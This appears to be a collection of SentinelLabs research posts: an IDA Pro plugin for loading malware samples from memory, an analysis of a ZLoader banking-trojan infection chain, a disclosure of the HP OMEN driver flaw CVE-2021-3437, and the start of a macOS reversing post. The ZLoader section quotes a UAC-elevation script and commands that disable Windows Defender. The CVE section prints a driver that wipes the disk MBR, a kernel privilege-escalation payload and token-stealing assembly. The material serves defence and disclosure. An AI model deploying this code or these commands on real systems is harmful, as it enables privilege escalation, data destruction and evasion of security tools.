
Keep Malware Off Your Disk With SentinelOne’s IDA Pro Memory Loader Plugin

25 March 2021 at 11:26

Recent events have highlighted the fact that security researchers are high value targets for threat actors, and given that we deal with malware samples day in and day out, the possibility of either an accidental or intentional compromise is something we all have to take extra precautions to prevent.

Most security researchers will have some kind of AV installed, so downloading a malicious file should trigger a static detection as soon as it is written to disk, but that raises two problems. First, if the researcher is actively investigating a sample and the AV throws a static detection, this can hamper the very work the researcher is employed to do. Second, it’s good practice not to put known malicious files on your PC: you might execute them by mistake and/or make your machine “dirty” (in terms of IOCs found on your machine).

One solution to this problem would be to avoid writing samples to disk. As malware reverse engineers, we have to load malware, shellcode and assorted binaries into IDA on a daily basis. After a suggestion from our team member Kasif Dekel, we decided to tackle this problem by creating an IDA plugin that loads a binary into IDA without writing it to disk. We have made this plugin publicly available for other researchers to use. In this post, we’ll describe our Memory Loader plugin’s features, installation and usage.

Memory Loader Plugin

If you have not used IDA Pro plugins before, a plugin extends the functionality of the IDA database. For example, a plugin can take all function entry points and mark them in red in the graph view, making them easier to spot. A plugin runs after the IDA database is initialized, meaning a binary has already been loaded into the database. A loader, by contrast, is what loads a binary into the IDA database in the first place.

Our Memory Loader plugin offers several advanced features to the malware analyst. These include loading files from a memory buffer (any source), loading files from zip files (encrypted/unencrypted), and loading files from a URL. Let’s take a look at each in turn.

Loading Files From a Memory Buffer

This plugin ships with a library called MemoryLoader that anyone can use to further extend IDA Pro’s capability to load files from a memory buffer from any source.

MemoryLoader is the base memory loader, a DLL in which the memory loading capabilities are implemented. Its main functionality is to take a buffer of bytes from memory and load it into IDA with the appropriate loading scheme.

You will then have an IDA database file and be able to reverse engineer the file just as if it were loaded from the disk but without the attendant risks that come with saving malware to your local drive.

After you’ve analyzed the binary, save your work and close IDA Pro. The temporary IDA db files will be deleted and you will be left with your IDA database file and no binary on the disk.

Loading Files From a Zip/Encrypted Zip

MemZipLoader is able to load both encrypted and plain ZIP files into memory without writing them to disk. The loader accepts ZIP-format files (.zip). After accepting a zip file, it will display the files inside the archive and allow you to choose the one you want to work with.

MemZipLoader will extract the chosen file from the input ZIP into a memory buffer and load it into IDA without ever writing the extracted file to disk; only the (possibly encrypted) ZIP itself remains on your drive.

Loading Files From a URL

UrlLoader makes loading a file from a URL very easy. The loader is suggested for any file you open. After you select UrlLoader, you will be asked to enter a URL, and the downloaded file will be stored in a memory buffer.

You will be able to reverse engineer the file and make changes to the IDA database. After you close the IDA window, you will be left with only the database file.

Installation Guide (tested on IDA 7.5+)

  1. Download the zip with the binaries from here.
  2. Extract the zip to a folder.
  3. Place the memory loader DLLs in the IDA directory:
      1. MemoryLoader.dll -> (C:\Program Files\IDA Pro 7.5)
      2. MemoryLoader64.dll -> (C:\Program Files\IDA Pro 7.5)

  4. Place the loaders in the loaders directory of IDA:
    1. MemZipLoader64.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
    2. UrlLoader64.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
    3. UrlLoader.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
    4. MemZipLoader.dll -> (C:\Program Files\IDA Pro 7.5\loaders)

How to Use MemZipLoader & UrlLoader

You can load binaries with MemZipLoader and UrlLoader as follows:


  1. Open IDA and choose a zip file.
  2. IDA should automatically suggest MemZipLoader:
  3. Once selected, a list of the files in the zip will be displayed:
  4. IDA will then use the loader code and load the file as if the binary were local on the system.


  1. Open any file on your computer from a directory you have write privileges to.
  2. UrlLoader will be suggested as one of the loaders for the file.
  3. After you choose UrlLoader, you will be asked to enter a URL:
  4. The loader will browse to the network location you entered. Then IDA Pro will use the loader code and load the binary as if it were a local file.

Setting Up Visual Studio Development

In order to set up the plugin for Visual Studio development, follow these steps.

    1. Open a DLL project in Visual Studio.
    2. An IDA loader has three key parts: the accept function, the load function and the loader definition block. Your dllmain file is where the loader definition goes.
    3. accept_file – this function returns a boolean indicating whether the loader is relevant to the binary currently being loaded into IDA. For example, if you are loading a PE, build_loaders_list should return PE.dll as one of the loading options.

load_file – this function is responsible for loading the file into the database. This function behaves differently for each loader, so there is not much general advice to give here. Documentation on loaders can be found here.
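The accept/load split can be illustrated with a self-contained toy (these are not the real IDA SDK signatures; `toy_accept_file` and `toy_load_file` are hypothetical stand-ins for accept_file and load_file):

```cpp
#include <cassert>
#include <cstdint>
#include <string>
#include <vector>

// Toy illustration of the accept/load split (NOT the real IDA SDK
// signatures): the accept step inspects the buffer and names the
// format, the load step would then populate the database.
struct ToyLoaderResult {
    bool accepted;
    std::string format_name;
};

// "accept_file": peek at the first bytes and decide whether this loader
// handles the input. Here we only recognize the MZ magic of a PE file,
// the way a PE loader would advertise itself in the loader list.
ToyLoaderResult toy_accept_file(const std::vector<uint8_t>& buf) {
    if (buf.size() >= 2 && buf[0] == 'M' && buf[1] == 'Z')
        return {true, "Portable Executable (toy)"};
    return {false, ""};
}

// "load_file": only called after the user picks this loader; a real one
// would walk headers and create segments. We just report the size as a
// stand-in for "bytes mapped into the database".
size_t toy_load_file(const std::vector<uint8_t>& buf) {
    return buf.size();
}
```

The real SDK passes a `linput_t` input source instead of a raw buffer, which is exactly the seam the Memory Loader plugin uses to feed bytes from memory rather than from a file.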

  1. The project can be compiled into two versions: 64-bit IDA with 64-bit addresses, and 64-bit IDA with 32-bit addresses. From this point forward we will mark them:
    1. X64 | X64 – 64-bit IDA with 64-bit addresses
    2. X32 | X64 – 64-bit IDA with 32-bit addresses


  • Target file name (Configuration Properties -> Target Name)
    1. X64 | X64 – $(ProjectName)64
    2. X32 | X64 – $(ProjectName)
  • Include header files (same for X64 | X64 and X32 | X64):
    1. Configuration Properties -> C/C++ -> Additional Include Directories – should point to the location of your IDA PRO SDK.
    2. Set Runtime Library -> Multi-threaded Debug (/MTd)
  • Include lib files:
    1. X64 | X64
      1. idasdk75\lib\x64_win_vc_64
  • X64 | X32
    1. idasdk75\lib\x64_win_vc_32
    2. idasdk75\lib\x64_win_vc_64
  • Preprocessor Definitions (Configuration Properties -> C/C++ -> Preprocessor Definitions):
    1. X64 | X64 add: __EA64__
    2. X32 | X64 add: __X64__, __NT__
  • Preprocessor Definitions (Configuration Properties -> C/C++ -> Undefined Preprocessor Definitions):
    1. X32 | X64: __EA64__
Conclusion

When downloading malware to analyze from repositories like VirusTotal, the sample is usually zipped so that endpoint security doesn’t detect it as malicious. Using our Memory Loader plugin will enable you to reverse engineer malicious binaries without writing them to disk.

Using the Memory Loader plugin also saves you time when analyzing binaries. When working with malicious content in IDA Pro, a separate environment is often created for it, usually in a virtual machine. Copying the binary and setting up the machine for research every time you want to open IDA is expensive in time. The Memory Loader plugin allows you to work from your own machine in a safer and more productive way.

Please note that an IDA Pro license is needed to use and develop extensions for IDA Pro.

The SentinelOne IDA Pro Memory Loader Plugin is available on GitHub.


The post Keep Malware Off Your Disk With SentinelOne’s IDA Pro Memory Loader Plugin appeared first on SentinelLabs.

Hide and Seek | New Zloader Infection Chain Comes With Improved Stealth and Evasion Mechanisms

13 September 2021 at 16:33

By Antonio Pirozzi and Antonio Cocomazzi

Executive Summary

  • New ZLoader campaign has a stealthier distribution mechanism which deploys a signed dropper with lower rates of detection.
  • The campaign primarily targets users of Australian and German banking institutions.
  • The new infection chain implements a stager which disables all Windows Defender modules.
  • The threat actor uses a backdoored version of the Windows utility wextract.exe to embed the ZLoader payload and lower the chance of detection.
  • SentinelLabs identified the entire infrastructure of the ‘Tim’ botnet, composed of more than 350 recently-registered C2 domains.

Read the Full Report


ZLoader (also known as Terdot) was first discovered in 2016 and is a fork of the infamous Zeus banking trojan. It is still under active development. A multitude of different versions have appeared since December 2019, with an average frequency of 1-2 new versions released each week.

ZLoader is a typical banking trojan which implements web injection to steal cookies, passwords and any sensitive information. It attacks users of financial institutions all over the world and has also been used to deliver ransomware families like Egregor and Ryuk. It also provides backdoor capabilities and acts as a generic loader to deliver other forms of malware. Newer versions implement a VNC module which permits users to open a hidden channel that gives the operators remote access to victim systems. ZLoader relies primarily on dynamic data exchange (DDE) and macro obfuscation to deliver the final payload through crafted documents.

A recent evolution of the infection chain included the dynamic creation of agents, which download the payload from a remote server. The new infection chain observed by SentinelLabs demonstrates a higher level of stealth by disabling Windows Defender and relying on living-off-the-land binaries and scripts (LOLBAS) in order to evade detection. During our investigation, we were also able to map all the new ZLoader C2 infrastructure related to the ‘Tim’ botnet and identify the scope of the campaign and its objectives, which primarily involved stealing bank credentials from customers of European banks.

Overview of the ZLoader infection chain

Technical Analysis

The malware is downloaded from a Google advertisement published through Google Adwords. In this campaign, the attackers use an indirect way to compromise victims instead of using the classic approach of compromising the victims directly, such as by phishing.

We observed the following pattern of activity that leads to infection:

  • The user performs a search to find a website from which to download the required software; in our case, we observed a search for “team viewer download”.
  • The user clicks on an advertisement shown by Google and is redirected to the fake TeamViewer site under the attacker’s control.
  • The user is tricked into downloading the fake software in a signed MSI format.

Once the user clicks on the advertisement, they are redirected through the aclk page. This redirect demonstrates the attackers’ use of Google Adwords to gain traffic:


After further navigation (and redirects), the malicious Team-Viewer.msi is downloaded from the final URL hxxps://

The downloaded file is a fake TeamViewer installer signed on 2021-08-23 10:07:00. It appears that the cybercriminals managed to obtain a valid certificate issued by Flyintellect Inc, a Software company in Brampton, Canada. The company was registered on 29th June 2021, suggesting that the threat actor possibly registered the company for the purpose of obtaining those certificates.

Pivoting from this certificate, we were able to spot other samples signed with the same certificate. These suggest that the attackers had multiple ongoing campaigns beyond TeamViewer, including fakes such as JavaPlug-in.msi, Zoom.msi, and discord.msi.

At the time of writing, these four samples have no detections on VirusTotal (a complete list of IoCs can be found in the full report).

New Zloader Infection Chain Bypasses Defenses

The .msi file is the first stage dropper which runs an installation wizard. It creates random legitimate files in the directory C:\Program Files (x86)\Sun Technology Network\Oracle Java SE. Once the folder has been created, it will drop the setup.bat file, triggering the initial infection chain by executing cmd.exe /c setup.bat.

This initiates the second stage of the infection chain, downloading the dropper updatescript.bat through the PowerShell cmdlet Invoke-WebRequest, from hxxps:// The dropper then executes the third stage with the command cmd /c updatescript.bat.

The third stage dropper contains most of the logic to impair the defenses of the machine. It also drops the fourth stage using a stealthy execution technique. At first, it disables all the Windows Defender modules through the PowerShell cmdlet Set-MpPreference. It then adds exclusions, such as regsvr32, *.exe, *.dll, with the cmdlet Add-MpPreference to hide all the components of the malware from Windows Defender.

At this point the fourth stage dropper is downloaded from the URL hxxps:// and saved as tim.exe. The execution of tim.exe is done through the LOLBAS command explorer.exe tim.exe. This allows the attacker to break the parent/child correlation often used by EDRs for detection.

The first part of the attack chain

The tim.exe binary is a backdoored version of the Windows utility wextract.exe. This backdoored version contains extra embedded resources with names like “RUNPROGRAM”, “REBOOT”, and “POSTRUNPROGRAM”, among others.

Resources embedded in the tim.exe binary (left) and the legitimate wextract.exe (right)

This backdoored version contains additional code for creating a new malicious batch file with the name tim.bat. It is placed in a temporary directory retrieved with the Win32 function GetTempPath(). It retrieves the content of the resource “RUNPROGRAM” (containing the string value cmd /c tim.bat) and uses it as the command line parameter for the CreateProcess() Win32 function.

The tim.bat file is a very short script that downloads the final ZLoader DLL payload with the name tim.dll from the URL hxxps:// and executes it through the LOLBAS command regsvr32 tim.dll. This allows the attackers to proxy the execution of the DLL through a signed binary by Microsoft.

This dropper also downloads the script nsudo.bat from hxxps:// and runs it asynchronously, in parallel with the execution of tim.dll. The script aims to further impair the machine’s defenses.

Privilege Escalation and Defense Evasion

The nsudo.bat script performs multiple operations with the goal of elevating privileges on the system and impairing defenses.

At first, it checks if the current context of execution is privileged by verifying the access to the SYSTEM hive. This is done through %SYSTEMROOT%\system32\cacls.exe  %SYSTEMROOT%\system32\config\system. If the process in which it runs has no access on that hive it will jump to the label :UACPrompt.

This part of the script implements an auto elevation VBScript that aims to run an elevated process in order to make system changes. The snippet of the script in charge of the UACPrompt feature is as follows:

      echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
      set params = %*:"="
      echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs"
      del "%temp%\getadmin.vbs"
      exit /B

This snippet creates the VBScript getadmin.vbs, runs it and deletes it. Using a VBScript eases the interaction with COM objects. In this case, it instantiates a Shell.Application object and calls the function ShellExecute() to trigger the UAC elevation and the interaction with the AppInfo service.

Once the elevation occurs the script is run with elevated privileges. At this point, the script performs the steps to disable Windows Defender. It does this through a software utility called NSudo renamed as javase.exe, which is downloaded from the URL hxxps:// The attacker leverages this utility in order to spawn a process with “TrustedInstaller” privileges. This can be abused by the attacker to disable the Windows Defender service even if it runs as a Protected Process Light.

The script downloads the file autorun100.bat from and places it in the startup folder %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. This script ensures that the WinDefend service is deleted at the next boot through the utility NSudo.

The nsudo.bat script also completely disables UAC by setting the following registry key to 0:


In order to have these changes take effect, the computer is forced to restart. The nsudo.bat script does this with shutdown.exe /r /f /t 00. At this point, the attack chain of the script nsudo.bat is complete.

ZLoader Payload Execution Chain

The tim.dll is the main ZLoader payload that encapsulates the unpacking logic and adds persistence. It is executed through the system signed binary regsvr32.exe.

It first creates a directory with a random name inside %APPDATA% and then creates a copy of itself in the newly created directory. It then adds a new registry key in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. The registry key value contains the command line of the malicious process to spawn on user logon. This ensures that the attacker’s implant survives machine reboots. The DLL execution also relies on the regsvr32 binary. This is an example of the registry key created on a single run of the sample:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Iwalcac
value: regsvr32.exe /s C:\Users\[REDACTED]\AppData\Roaming\Kyubt\otcyovw.dll

Then it starts the unpacking by leveraging a process injection technique known as Thread Hijacking. It contains a small variation but essentially uses the same pattern of Win32 API calls used for Thread Hijacking:

VirtualAllocEx() -> WriteProcessMemory() -> GetThreadContext() -> SetThreadContext() -> ResumeThread()

It first creates a new process as a host for the unpacked DLL; for this sample it uses a new instance of msiexec.exe. Then it allocates and writes two RWX memory regions inside the target process. One contains the unpacked version of the DLL XOR’ed with a key; the second contains shellcode to decrypt the DLL and jump to its entry point.

The unpacking routine

Once the memory is written in the remote process, it sets the new thread context’s EIP to point to the unpacking shellcode and resumes the main thread of msiexec. This is how the hijacking of the main thread occurs. The unpacked DLL can be extracted from the memory of the msiexec.exe process by dumping the memory address used in the first WriteProcessMemory() call.

We have compared the unpacked DLL with the recent ZLoader payloads and found a similarity score of 92.62%.
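The report does not specify which tool produced the 92.62% score. As a purely illustrative baseline, a naive byte-level similarity between two dumps could be computed like this (`byte_similarity` is a hypothetical helper, far cruder than real binary-diffing tools):

```cpp
#include <algorithm>
#include <cassert>
#include <cstdint>
#include <vector>

// Naive positional byte similarity: fraction of matching bytes at the
// same offset, divided by the longer buffer to penalize size mismatch.
// Real binary diffing compares functions and control flow, not raw bytes.
double byte_similarity(const std::vector<uint8_t>& a,
                       const std::vector<uint8_t>& b) {
    size_t n = std::min(a.size(), b.size());
    if (n == 0) return 0.0;
    size_t same = 0;
    for (size_t i = 0; i < n; ++i)
        if (a[i] == b[i]) ++same;
    return static_cast<double>(same) /
           static_cast<double>(std::max(a.size(), b.size()));
}
```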

Final part of the attack chain

Analyzing The New Zloader C2 Infrastructure

The analyzed sample belongs to the ‘Tim’ Botnet as defined in the malware configuration. Some of the embedded C2s (the full list can be found in the IoC section of the full report) are also shared by the googleaktualizacija ZLoader botnet.

One of the C2s dumped from the infected machine, mjwougyhwlgewbajxbnn[.]com, used to resolve to 194.58.108[.]89 until the 25th of August 2021. As of the 26th of August, however, it points to 195.24.66[.]70.

The IP 194.58.108[.]89 belongs to ASN 48287 – RU-CENTER and seems to deploy many different domains – 350 at the time of writing – forming the new ZLoader infrastructure. Some domains implement the gate.php component, which is a fingerprint of the ZLoader botnet. We noticed during our investigation that all the domains were registered from April to Aug 2021, and they switched to the new IP (195.24.66[.]70) on the 26th of August.

A Targeted Campaign: AU And DE Financial Institutions

The new ZLoader campaign is targeted. The final payload has a list of embedded AU and DE domains, and contains some strings with wildcards used by the malware to intercept specific users’ web requests to bank portals.
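Such wildcard target strings are typically matched against every URL the browser requests. The matcher below is an illustrative sketch supporting only `*`; neither the function nor the example patterns come from the actual ZLoader configuration:

```cpp
#include <cassert>
#include <string>

// Greedy wildcard matcher with backtracking, supporting only '*'
// (matches any run of characters). Sketch of how web-inject target
// patterns could be applied to intercepted request URLs.
bool wildcard_match(const std::string& pat, const std::string& s) {
    size_t p = 0, i = 0, star = std::string::npos, mark = 0;
    while (i < s.size()) {
        if (p < pat.size() && pat[p] == s[i]) { ++p; ++i; }
        else if (p < pat.size() && pat[p] == '*') { star = p++; mark = i; }
        else if (star != std::string::npos) { p = star + 1; i = ++mark; }
        else return false;                     // literal mismatch, no star
    }
    while (p < pat.size() && pat[p] == '*') ++p;  // trailing stars match ""
    return p == pat.size();
}
```

A request URL matching one of the configured patterns would then trigger the web-inject logic for that banking portal.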


From our analysis of the communication patterns related to mjwougyhwlgewbajxbn[.]com, we were able to map most of the source traffic used by the operators of the botnet.

The pornofilmspremium[.]com domain delivers the tim.exe component. The domain was registered on 2021-07-19 (Location RU, ASN: REG RU 197695) and is associated by the community with ZLoader [1, 2]. The email address [email protected][.]com was used to register this domain and a number of others, as detailed in the full report.


The attack chain analyzed in this research shows how the attack’s complexity has grown in order to reach a higher level of stealth. The first stage dropper has been changed from the classic malicious document to a stealthy, signed MSI payload. It uses backdoored binaries and a series of LOLBAS to impair defenses and proxy the execution of its payloads.

This is the first time we have observed this attack chain in a ZLoader campaign. At the time of writing, we have no evidence that the delivery chain has been implemented by a specific affiliate or if it was provided by the main operator. SentinelLabs continues to monitor this threat in order to track further activity.

Indicators of Compromise

For a full list of IoCs, see the full report.

Read the Full Report


We thank Awais Munir for his assistance in the technical analysis of the Zloader campaign.

CVE-2021-3437 | HP OMEN Gaming Hub Privilege Escalation Bug Hits Millions of Gaming Devices

14 September 2021 at 11:00

Executive Summary

  • SentinelLabs has discovered a high severity flaw in an HP OMEN driver affecting millions of devices worldwide.
  • Attackers could exploit these vulnerabilities to locally escalate to kernel-mode privileges. With this level of access, attackers can disable security products, overwrite system components, corrupt the OS, or perform any malicious operations unimpeded.
  • SentinelLabs’ findings were proactively reported to HP on Feb 17, 2021 and the vulnerability is tracked as CVE-2021-3437, marked with CVSS Score 7.8.
  • HP has released a security update to its customers to address these vulnerabilities.
  • At this time, SentinelOne has not discovered evidence of in-the-wild abuse.


HP OMEN Gaming Hub, previously known as HP OMEN Command Center, is a software product that comes preinstalled on HP OMEN desktops and laptops. This software can be used to control and optimize settings such as device GPU, fan speeds, CPU overclocking, memory and more. The same software is used to set and adjust lighting and other controls on gaming devices and accessories such as mouse and keyboard.

Following on from our previous research into other HP products, we discovered that this software utilizes a driver that contains vulnerabilities that could allow malicious actors to achieve a privilege escalation to kernel mode without needing administrator privileges.

CVE-2021-3437 essentially derives from the HP OMEN Gaming Hub software using vulnerable code partially copied from an open source driver. In this research paper, we present details explaining how the vulnerability occurs and how it can be mitigated. We suggest best practices for developers that would help reduce the attack surface provided by device drivers with exposed IOCTLs handlers to low-privileged users.

Technical Details

Under the hood of HP OMEN Gaming Hub lies the HpPortIox64.sys driver, C:\Windows\System32\drivers\HpPortIox64.sys. This driver is developed by HP as part of OMEN, but it is actually a partial copy of another problematic driver, WinRing0.sys, developed by OpenLibSys.

The link between the two drivers can readily be seen as on some signed HP versions the metadata information shows the original filename and product name:

File Version information from CFF Explorer

Unfortunately, issues with the WinRing0.sys driver are well-known. This driver enables user-mode applications to perform various privileged kernel-mode operations via an IOCTL interface.

The operations provided by the HpPortIox64.sys driver include read/write kernel memory, read/write PCI configurations, read/write IO ports, and read/write MSRs. Developers may find it convenient to expose a generic interface of privileged operations to user mode for stability reasons, keeping as much code as possible out of the kernel module.

The IOCTL codes 0x9C4060CC, 0x9C4060D0, 0x9C4060D4, 0x9C40A0D8, 0x9C40A0DC and 0x9C40A0E0 allow user mode applications with low privileges to read/write 1/2/4 bytes to or from an IO port. This could be leveraged in several ways to ultimately run code with elevated privileges in a manner we have previously described here.

The following image highlights the vulnerable code that allows unauthorized access to IN/OUT instructions, with IN instructions marked in red and OUT instructions marked in blue:

The Vulnerable Code – unauthorized access to IN/OUT instructions

Since I/O privilege level (IOPL) equals the current privilege level (CPL), it is possible to interact with peripheral devices such as internal storage and GPU to either read/write directly to the disk or to invoke Direct Memory Access (DMA) operations. For example, we could communicate with ATA port IO for directly writing to the disk, then overwrite a binary that is loaded by a privileged process.

For the purposes of illustration, we wrote this sample driver to demonstrate the attack without pursuing an actual exploit:

#define BASE 0x1F0
// Standard ATA status-register bits; these definitions were missing from
// the published listing and have been restored.
#define STATUS_BSY 0x80
#define STATUS_RDY 0x40

unsigned char port_byte_in(unsigned short port) {
	return __inbyte(port);
}

void port_byte_out(unsigned short port, unsigned char data) {
	__outbyte(port, data);
}

void port_long_out(unsigned short port, unsigned long data) {
	__outdword(port, data);
}

unsigned short port_word_in(unsigned short port) {
	return __inword(port);
}

static void ATA_wait_BSY() // Wait for BSY to be 0
{
	while (port_byte_in(BASE + 7) & STATUS_BSY);
}

static void ATA_wait_DRQ() // Wait for DRQ to be 1
{
	while (!(port_byte_in(BASE + 7) & STATUS_RDY));
}

void read_sectors_ATA_PIO(unsigned long LBA, unsigned char sector_count) {
	port_byte_out(BASE + 6, 0xE0 | ((LBA >> 24) & 0xF));
	port_byte_out(BASE + 2, sector_count);
	port_byte_out(BASE + 3, (unsigned char)LBA);
	port_byte_out(BASE + 4, (unsigned char)(LBA >> 8));
	port_byte_out(BASE + 5, (unsigned char)(LBA >> 16));
	port_byte_out(BASE + 7, 0x20); // Send the read command

	for (int j = 0; j < sector_count; j++) {
		for (int i = 0; i < 256; i++) {
			USHORT a = port_word_in(BASE);
			DbgPrint("0x%x, ", a);
		}
	}
}

void write_sectors_ATA_PIO(unsigned char LBA, unsigned char sector_count) {
	ATA_wait_BSY();
	port_byte_out(BASE + 6, 0xE0 | ((LBA >> 24) & 0xF));
	port_byte_out(BASE + 2, sector_count);
	port_byte_out(BASE + 3, (unsigned char)LBA);
	port_byte_out(BASE + 4, (unsigned char)(LBA >> 8));
	port_byte_out(BASE + 5, (unsigned char)(LBA >> 16));
	port_byte_out(BASE + 7, 0x30); // Send the write command

	for (int j = 0; j < sector_count; j++)
		for (int i = 0; i < 256; i++) {
			port_long_out(BASE, 0xffffffff);
		}
}

static void drv_unload(PDRIVER_OBJECT driver_object) {
	UNREFERENCED_PARAMETER(driver_object);
}

NTSTATUS DriverEntry(PDRIVER_OBJECT driver_object, PUNICODE_STRING registry) {
	UNREFERENCED_PARAMETER(registry);
	driver_object->DriverUnload = drv_unload;

	DbgPrint("Before: \n");
	read_sectors_ATA_PIO(0, 1);
	write_sectors_ATA_PIO(0, 1);
	DbgPrint("\nAfter: \n");
	read_sectors_ATA_PIO(0, 1);
	return STATUS_SUCCESS;
}

This ATA PIO read/write is based on LearnOS. Running this driver will result in the following DebugView prints:

Debug logging from the driver in DbgView utility

Trying to restart this machine will result in an ‘Operating System not found’ error message because our demo driver destroyed the first sector of the disk (the MBR).

The machine fails to boot due to corrupted MBR

It’s worth mentioning that the impact of this vulnerability is platform dependent. It can potentially be used to attack device firmware or perform legacy PCI access by accessing ports 0xCF8/0xCFC. Some laptops may have embedded controllers which are reachable via IO port access.

Another interesting vulnerability in this driver is an arbitrary MSR read/write, accessible via IOCTLs 0x9C402084 and 0x9C402088. Model-Specific Registers (MSRs) are registers for querying or modifying CPU data. RDMSR and WRMSR are used to read and write an MSR, respectively. Documentation for WRMSR and RDMSR can be found in the Intel(R) 64 and IA-32 Architectures Software Developer’s Manual Volume 2, Chapter 5.

In the following image, arbitrary MSR read is marked in green, MSR write in blue, and HLT is marked in red (accessible via IOCTL 0x9C402090, which allows executing the instruction in a privileged context).

Vulnerable code with unauthorized access to MSR registers

Most modern systems only use MSR_LSTAR during a system call transition from user-mode to kernel-mode:

MSR_LSTAR MSR register in WinDbg

It should be noted that on 64-bit KPTI enabled systems, LSTAR MSR points to nt!KiSystemCall64Shadow.

The entire transition process looks like the following:

The entire process of transition from the User Mode to Kernel mode

These vulnerabilities may allow malicious actors to execute code in kernel mode very easily, since the transition to kernel-mode is done via an MSR. This is basically an exposed WRMSR instruction (via IOCTL) that gives an attacker an arbitrary pointer overwrite primitive. We can overwrite the LSTAR MSR and achieve a privilege escalation to kernel mode without needing admin privileges to communicate with this device driver.

Using the DeviceTree tool from OSR, we can see that this driver accepts IOCTLs without ACL enforcement (note: some drivers handle access to devices independently in their IRP_MJ_CREATE routines):

Using DeviceTree software to examine the security descriptor of the device
The function that handles IOCTLs to write to arbitrary MSRs

Weaponizing this kind of vulnerability is trivial as there’s no need to reinvent anything; we just took the msrexec project and armed it with our code to elevate our privileges.

Our payload to elevate privileges:

	//extern "C" void elevate_privileges(UINT64 pid);
	//DWORD current_process_id = GetCurrentProcessId();
	// NOTE: the template arguments of the reinterpret_casts below were lost
	// in publishing; these function-pointer types are our reconstruction.
	using dbg_print_t = int(*)(const char*, ...);
	using ex_alloc_pool_t = void*(*)(UINT32, SIZE_T);
	vdm::msrexec_ctx msrexec(_write_msr);
	msrexec.exec([&](void* krnl_base, get_system_routine_t get_kroutine) -> void {
		const auto dbg_print = reinterpret_cast<dbg_print_t>(get_kroutine(krnl_base, "DbgPrint"));
		const auto ex_alloc_pool = reinterpret_cast<ex_alloc_pool_t>(get_kroutine(krnl_base, "ExAllocatePool"));

		dbg_print("> allocated pool -> 0x%p\n", ex_alloc_pool(NULL, 0x1000));
		dbg_print("> cr4 -> 0x%p\n", __readcr4());
	});

The assembly payload:

elevate_privileges proc
	push rsi
	mov rsi, rcx
	mov rbx, gs:[188h]
	mov rbx, [rbx + 220h]
__findsys:					; walk the process list until PID 4 (System)
	mov rbx, [rbx + 448h]
	sub rbx, 448h
	mov rcx, [rbx + 440h]
	cmp rcx, 4
	jnz __findsys

	mov rax, rbx
	mov rbx, gs:[188h]
	mov rbx, [rbx + 220h]
__findarg:					; walk the process list until the target PID
	mov rbx, [rbx + 448h]
	sub rbx, 448h
	mov rcx, [rbx + 440h]
	cmp rcx, rsi
	jnz __findarg

	mov rcx, [rax + 4b8h]			; copy the System process token
	and cl, 0f0h
	mov [rbx + 4b8h], rcx

	xor rax, rax
	pop rsi
	ret
elevate_privileges endp

Note that this payload is written specifically for Windows 10 20H2.

Let’s see what it looks like in action.

OMEN Gaming Hub Privilege Escalation

Initially, HP developed a fix that verifies the user-mode application that initiates communication with the driver. It opens the nt!_FILE_OBJECT of the caller, parses its PE and validates the digital signature, all from kernel mode. While this in itself should be considered unsafe, their implementation (which also introduced several additional vulnerabilities) did not fix the original issue. It is very easy to bypass these mitigations using techniques such as “Process Hollowing”. Consider the following program as an example:

int main() {

    puts("Opening a handle to HpPortIO\r\n");

    // device path assumed from the driver name; access flags are illustrative
    HANDLE hDevice = CreateFileA("\\\\.\\HpPortIO",
                                 GENERIC_READ | GENERIC_WRITE,
                                 0, NULL, OPEN_EXISTING, 0, NULL);

    if (hDevice == INVALID_HANDLE_VALUE) {

        printf("failed! getlasterror: %d\r\n", GetLastError());

        return -1;
    }

    printf("succeeded! handle: %p\r\n", hDevice);

    return 0;
}

Running this program against the fix without Process Hollowing will result in:

    Opening a handle to HpPortIO failed! 
    getlasterror: 87

While running this with Process Hollowing will result in:

    Opening a handle to HpPortIO succeeded! 
    handle: <HANDLE>

It’s worth mentioning that security mechanisms such as PatchGuard and security hypervisors should mitigate this exploit to a certain extent. However, PatchGuard can still be bypassed: MSRs are among the structures it protects, but since it samples them only periodically, restoring the original values quickly enough may allow an attacker to evade it.


An exploitable kernel driver vulnerability can lead an unprivileged user to SYSTEM, since the vulnerable driver is locally available to anyone.

This high severity flaw, if exploited, could allow any user on the computer, even without privileges, to escalate privileges and run code in kernel mode. One obvious abuse of such a vulnerability is to bypass security products.

An attacker with access to an organization’s network may also gain access to execute code on unpatched systems and use these vulnerabilities to gain local elevation of privileges. Attackers can then leverage other techniques to pivot to the broader network, like lateral movement.

Impacted products:

  • HP OMEN Gaming Hub prior to version is affected
  • HP OMEN Gaming Hub SDK Package prior to version 1.0.44 is affected

Development Suggestions

To reduce the attack surface provided by device drivers with exposed IOCTLs handlers, developers should enforce strong ACLs on device objects, verify user input and not expose a generic interface to kernel mode operations.


HP released a Security Advisory on September 14th to address this vulnerability. We recommend customers, both enterprise and consumer, review the HP Security Advisory for complete remediation details.


This high severity vulnerability affects millions of PCs and users worldwide. While we haven’t seen any indicators that these vulnerabilities have been exploited in the wild up till now, using any OMEN-branded PC with the vulnerable driver utilized by OMEN Gaming Hub makes the user potentially vulnerable. Therefore, we urge users of OMEN PCs to ensure they take appropriate mitigating measures without delay.

We would like to thank HP for their approach to our disclosure and for remediating the vulnerabilities quickly.

Disclosure Timeline

17 Feb 2021 – Initial report
17 Feb 2021 – HP requested more information
14 May 2021 – HP sent us a fix for validation
16 May 2021 – SentinelLabs notified HP that the fix was insufficient
07 Jun 2021 – HP delivered another fix, this time disabling the whole feature
27 Jul 2021 – HP released an update to the software on the Microsoft Store
14 Sep 2021 – HP released a security advisory for CVE-2021-3437
14 Sep 2021 – SentinelLabs’ research published

Defeating macOS Malware Anti-Analysis Tricks with Radare2

20 September 2021 at 16:47

In this second post in our series on intermediate to advanced macOS malware reversing, we start our journey into tackling common challenges when dealing with macOS malware samples. Last time out, we took a look at how to use radare2 for rapid triage, and we’ll continue using r2 as we move through these various challenges. Along the way, we’ll pick up tips on both how to beat obstacles put in place by malware authors and how to use r2 more productively.

